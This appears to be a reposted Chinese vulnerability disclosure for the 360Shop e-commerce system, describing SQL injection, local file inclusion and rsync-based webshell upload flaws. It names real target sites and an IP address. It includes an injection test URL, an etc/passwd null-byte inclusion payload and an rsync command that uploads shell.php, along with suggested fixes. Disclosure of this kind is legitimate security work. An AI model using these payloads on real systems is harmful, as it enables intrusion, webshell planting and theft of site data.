好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

360Shop网店系统多个漏洞(含getshell) - 网站安全 -

360Shop网店系统多个 漏洞 ,部分漏洞可getshell。 详细说明:官网:http://www.360shop.com.cn 测试基于360Shop最新版本V3.0   使用这套系统的有独立的站点,如 http://www.iplaybox.net http://www.lpxxw.net 也有托管给官方的网店,这个比较多,可能有几千个,如: http://09pf.taodiantong.com http://520mpai.taodiantong.com     1. SQL注入 测试地址: http://www.iplaybox.net/?do=display&mod=goods&id=10839 Mysql错显Integer型注入,POST方法。         后台地址:http://www.iplaybox.net/admin/login.php         漏洞参数为 www.2cto.com xajaxargs   function initProcessRequests()     {         $xajaxRequest = array();         $xajaxRequest['xajaxr'] = @$_GET['xajaxr'];         $xajaxRequest['xajax'] = @$_GET['xajax'];         // reset RequestMode         if(isset($_GET['xajax']))         {             $_GET['xajax'] = null;             unset($_GET['xajax']);         }         // get the upload file local path         foreach(array_keys($_FILES) as $name)         {             if(isset($_GET[$name]) && !isset($_POST[$name]))             {                 $_POST[$name] = $this->_decodeUTF8Data($_GET[$name]);             }         }         $xajaxargs = array(get_original_data($_POST));         $xajaxRequest['xajaxargs'] = $xajaxargs;         $_POST = $xajaxRequest; }   2. 本地文件包含。 http://www.iplaybox.net/?do=display&id=3653&mod=etc/passwd%00.jpg       普通用户没有上传点,后台上传的图片也都到了官方提供的服务器上了,漏洞比较鸡肋。   3. Rsync任意文件上传。 推测一些网店用的是360Shop官方提供的服务器,使用了同样版本的Linux, PHP 和Nginx。其中部分服务器的Web目录直接Rsync可写,导致可直接上传Shell。   rsync.exe 360shop/shell.php root@121.52.224.82::lsa/admin         上传的shell。         目前网上貌似没有暴出该网店 系统 的漏洞,且网店和支付宝有接口,有撞库的可能。请cncert通知官方,依情况看是否要发布此漏洞~ 修复方案: 1. 过滤。 2. Rsync设置验证。

查看更多关于360Shop网店系统多个漏洞(含getshell) - 网站安全 -的详细内容...

  阅读:43次